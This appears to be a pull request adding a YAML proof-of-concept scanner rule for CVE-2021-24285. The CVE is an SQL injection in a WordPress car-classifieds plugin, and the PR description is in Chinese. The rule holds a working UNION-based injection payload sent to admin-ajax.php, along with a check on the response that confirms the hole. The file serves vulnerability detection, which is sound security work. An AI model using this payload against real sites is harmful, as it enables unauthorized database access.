### PR TITLE
wordpress cars-seller-auto-classifieds-script插件sql注入漏洞（CVE​​-2021-24285）

### DIFF
--- a/pocs/wordpress-plugins-cars-seller-auto-classifieds-script-cve-2021-24285-sqli.yml
+++ b/pocs/wordpress-plugins-cars-seller-auto-classifieds-script-cve-2021-24285-sqli.yml
@@ -1,0 +1,10 @@
+name: poc-yaml-wordpress-plugins-cars-seller-auto-classifieds-script-cve-2021-24285-sqli
+rules:
+  - method: POST
+    path: "/wp-admin/admin-ajax.php"
+    body: action=request_list_request&order_id=-1662 UNION ALL SELECT NULL,NULL,md5(89757),NULL,NULL,NULL,NULL,NULL,NULL-- -
+    expression: response.body.bcontains(b"7294a8e1350ed4228c575b9ab855de30")
+detail:
+  author: z1Ro0丶
+  links:
+    - https://idc.wanyunshuju.com/aqld/2177.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
wordpress cars-seller-auto-classifieds-script插件sql注入漏洞（CVE​​-2021-24285）
## 测试环境
插件下载地址：https://github.com/wp-plugins/cars-seller-auto-classifieds-script
## 备注
![图片](https://user-images.githubusercontent.com/53865566/121918223-6cc3db80-cd68-11eb-8da2-e326074c9558.png)
